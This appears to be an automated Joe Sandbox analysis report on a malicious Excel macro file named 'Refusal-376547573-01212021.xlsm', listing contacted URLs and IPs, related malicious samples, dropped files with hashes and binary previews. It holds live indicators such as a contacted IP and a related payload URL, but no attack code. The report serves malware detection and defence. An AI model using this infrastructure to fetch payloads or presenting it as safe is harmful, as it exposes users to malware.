                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://contentstorage.omex.office.net/addinclassifier/officeentities38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v238087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/mac38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.ai38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.com38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devices38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://directory.services.38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    172.107.2.98
                                                                                                                                                    unknownUnited States
                                                                                                                                                    397423TIER-NETUSfalse

                                                                                                                                                    Private

                                                                                                                                                    IP
                                                                                                                                                    192.168.2.1

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                    Analysis ID:342882
                                                                                                                                                    Start date:21.01.2021
                                                                                                                                                    Start time:20:20:27
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 7m 23s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:Refusal-376547573-01212021.xlsm
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:35
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal76.troj.expl.evad.winXLSM@3/10@2/2
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsm
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.109.32.63, 52.109.8.24, 40.88.32.150, 51.11.168.160, 95.101.184.67, 92.122.213.247, 92.122.213.194, 20.54.26.129, 67.26.75.254, 8.241.121.254, 67.27.157.254, 67.27.159.254, 67.27.158.126, 51.103.5.186, 104.108.60.202, 84.53.167.113, 52.155.217.156, 40.126.31.141, 40.126.31.6, 40.126.31.4, 20.190.159.134, 40.126.31.139, 20.190.159.136, 20.190.159.138, 40.126.31.1, 51.124.78.146, 51.104.136.2, 20.49.150.241
                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, e15275.g.akamaiedge.net, arc.msn.com, cdn.onenote.net.edgekey.net, www.tm.a.prd.aadg.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, emea1.notify.windows.com.akadns.net, wildcard.weather.microsoft.com.edgekey.net, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, dub2.current.a.prd.aadg.trafficmanager.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, par02p.wns.notify.trafficmanager.net, settingsfd-prod-weu1-endpoint.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    172.107.2.98Refusal-828813764-01212021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • www.toteteca.com/qzkiodlofm/5555555555.jpg

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    TIER-NETUSRefusal-828813764-01212021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 172.107.2.98
                                                                                                                                                    https://rmkcleaning.co.uk/Get hashmaliciousBrowse
                                                                                                                                                    • 198.37.123.126
                                                                                                                                                    Yx9bjnQEEl.exeGet hashmaliciousBrowse
                                                                                                                                                    • 154.16.168.6
                                                                                                                                                    sKu7FoPlk3.exeGet hashmaliciousBrowse
                                                                                                                                                    • 204.14.92.16
                                                                                                                                                    A7UvjUai3s.docGet hashmaliciousBrowse
                                                                                                                                                    • 104.149.216.158

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\38087A14-1EB5-47B7-A8E2-322A21C03B78
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):132942
                                                                                                                                                    Entropy (8bit):5.372879752498797
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:QcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:2rQ9DQW+zBX8P
                                                                                                                                                    MD5:24549FC773FD8AD545DA8AEA847E3A44
                                                                                                                                                    SHA1:19D99198C3F520700D9EB56EBCE9455FC2F84465
                                                                                                                                                    SHA-256:66A3A60F94ADB6AF20C1C2B9CB0FFA12C39B0E64DD495760DB323E056FF2F167
                                                                                                                                                    SHA-512:B7A57A3D0D9E02067521D23BBB1499B444658ADACA41B5679D4FB12733A6372CC8A670375A34817AAE568873BBDD968FEDB87A738C37282C0D43AADC3CA9DBB5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-21T19:21:21">.. Build: 16.0.13720.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\292D5639.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8301
                                                                                                                                                    Entropy (8bit):7.970711494690041
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                    MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                    SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                    SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                    SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\757BCDAF.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):848
                                                                                                                                                    Entropy (8bit):7.595467031611744
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                    MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                    SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                    SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                    SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\933916E6.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):557
                                                                                                                                                    Entropy (8bit):7.343009301479381
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                    MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                    SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                    SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                    SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\E0910000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):25989
                                                                                                                                                    Entropy (8bit):7.555019980751558
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:p8x/WsWMcLW4/WXc48aoVT0QNuzWKPqGn8VWPbEfAXA:OEs943nW+u7qk8VFyA
                                                                                                                                                    MD5:7C95C843472F6EF288763B6269C58222
                                                                                                                                                    SHA1:6BF0DAB4BC55CD5B1C0AD7CD3646D6B282DA86CE
                                                                                                                                                    SHA-256:200FA31B97DBCFDCD7B7413C0A612B9C98C24DCDE0715B040627FF23AF2D4E9F
                                                                                                                                                    SHA-512:E80499DFDB9B61AEB4EA6F82DADCB0FF2E26320C59189F1560BBB110B842714FF1E607A2BB5D550C54EC332CCD242F9952D5669CDA55EC46D5443FB59BE733C4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .U.n.0....?..........C....I?`L.%...a...;.....+........pz.r.z.D&.V\4.Q.WA.....m.MT..k..c+.H.j....q..*...>..]JR=:.&D.<...A.....j......T.g....C.?p.O6W7+..(../...w.....5.2...^.!..ba...C7.....1;..d.1=`.l.....}.......Hh.8.......Po"}..a(3..........R...i../!-.!,.. %LG5...fH.q.R..0..s`....LC%..v........W...#:.....y.S}....d7.vC9\OO|..1Nym...v.:..CB..y#wg..7.....H...s....*...x..w.........w......R]G.......c...c,.F..[....7.......PK..........!.................[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Fri Jan 22 03:21:23 2021, atime=Fri Jan 22 03:21:23 2021, length=8192, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):904
                                                                                                                                                    Entropy (8bit):4.654845391501887
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:8674CXUUuElPCH2Axj9Mp4Ty+WrjAZ/2bDB5LC5Lu4t2Y+xIBjKZm:867435x4AZiD+87aB6m
                                                                                                                                                    MD5:1436058C83B55A484B4669F99E862FC2
                                                                                                                                                    SHA1:0491FF356C5B4F8A151448A0448B5B7ECB2EF900
                                                                                                                                                    SHA-256:C45EB8B473B30582CC262A43351B397D53D6D78E0D59B28550506179A0232AB9
                                                                                                                                                    SHA-512:E10A988A16FF3903C60D64A31D13D2A173983A7C4D8ADF3060C5C4307085F836B7B2878079DE7F0BBE6BBA8800200ECDDDEEA8621E23076FF41184C20558759A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F........N....-...MC.v....MC.v.... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..6R."....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.6R.".....S....................2$..h.a.r.d.z.....~.1.....6R."..Desktop.h.......Ny.6R.".....Y..............>.....@X..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......061544...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Refusal-376547573-01212021.xlsm.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:42 2020, mtime=Fri Jan 22 03:21:24 2021, atime=Fri Jan 22 03:21:24 2021, length=25989, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2280
                                                                                                                                                    Entropy (8bit):4.654695980183461
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:8QJ5tHdxYRUA51xYnD0nKD7aB6myQJ5tHdxYRUA51xYnD0nKD7aB6m:8QBkl5sgnKaB6pQBkl5sgnKaB6
                                                                                                                                                    MD5:9F4971CF6946C702400896EED252F27F
                                                                                                                                                    SHA1:223082E3A887B38AB21FF720AFE0B47D3F309E0C
                                                                                                                                                    SHA-256:3532364EBE36B850AAA49206F0812FE829A5C09FC641DE6A9E7EE604A1254D87
                                                                                                                                                    SHA-512:6675B4EAB79B46B551970DC2786D289758605EE3E64464F0D65E4C526981ADC697A3F358FA7E11A150BFAD29E7569C3E1CB594573AFB9E08310BC4B500750E1B
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F.... .......:...=.H.v...=.H.v....e...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..6R."....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.6R.".....S....................2$..h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny.6R.".....Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.:f..6R." .REFUSA~1.XLS..p......>Qvx6R."....h.....................vd..R.e.f.u.s.a.l.-.3.7.6.5.4.7.5.7.3.-.0.1.2.1.2.0.2.1...x.l.s.m.......e...............-.......d...........>.S......C:\Users\user\Desktop\Refusal-376547573-01212021.xlsm..6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.f.u.s.a.l.-.3.7.6.5.4.7.5.7.3.-.0.1.2.1.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......061544...........!a..%.H.VZAj..."..-.........-..!a..%.H.VZAj..."..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):148
                                                                                                                                                    Entropy (8bit):4.8247197948806875
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:oyBVomxW8ADB5Ey7cpSvi5Ey7cpSmxW8ADB5Ey7cpSv:dj4nEygpG+EygpGnEygpc
                                                                                                                                                    MD5:AFC11D3D74A76046242D02396D4634A7
                                                                                                                                                    SHA1:DE581DD6056DCEE340257A9F53D09DD0126A396D
                                                                                                                                                    SHA-256:31427408FDAAADF3FACC4C17914235C80ABC70817DED80B2A19CB617A9EB3AEF
                                                                                                                                                    SHA-512:4D41A15321CEB9CBF7AABD654A3953D552AA21919CCA2D43F5E4F8FD9C8A9680387F00940AE4563E3124792846AFA34F5A4C4B2FC2F04E7ACEAF30826D53E8F2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: Desktop.LNK=0..[misc]..Refusal-376547573-01212021.xlsm.LNK=0..Refusal-376547573-01212021.xlsm.LNK=0..[misc]..Refusal-376547573-01212021.xlsm.LNK=0..
                                                                                                                                                    C:\Users\user\Desktop\81910000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):25989
                                                                                                                                                    Entropy (8bit):7.555019980751558
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:p8x/WsWMcLW4/WXc48aoVT0QNuzWKPqGn8VWPbEfAXA:OEs943nW+u7qk8VFyA
                                                                                                                                                    MD5:7C95C843472F6EF288763B6269C58222
                                                                                                                                                    SHA1:6BF0DAB4BC55CD5B1C0AD7CD3646D6B282DA86CE
                                                                                                                                                    SHA-256:200FA31B97DBCFDCD7B7413C0A612B9C98C24DCDE0715B040627FF23AF2D4E9F
                                                                                                                                                    SHA-512:E80499DFDB9B61AEB4EA6F82DADCB0FF2E26320C59189F1560BBB110B842714FF1E607A2BB5D550C54EC332CCD242F9952D5669CDA55EC46D5443FB59BE733C4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .U.n.0....?..........C....I?`L.%...a...;.....+........pz.r.z.D&.V\4.Q.WA.....m.MT..k..c+.H.j....q..*...>..]JR=:.&D.<...A.....j......T.g....C.?p.O6W7+..(../...w.....5.2...^.!..ba...C7.....1;..d.1=`.l.....}.......Hh.8.......Po"}..a(3..........R...i../!-.!,.. %LG5...fH.q.R..0..s`....LC%..v........W...#:.....y.S}....d7.vC9\OO|..1Nym...v.:..CB..y#wg..7.....H...s....*...x..w.........w......R]G.......c...c,.F..[....7.......PK..........!.................[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\Desktop\~$Refusal-376547573-01212021.xlsm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):330
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                    MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                    SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                    SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                    SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.559121572742115
                                                                                                                                                    TrID:
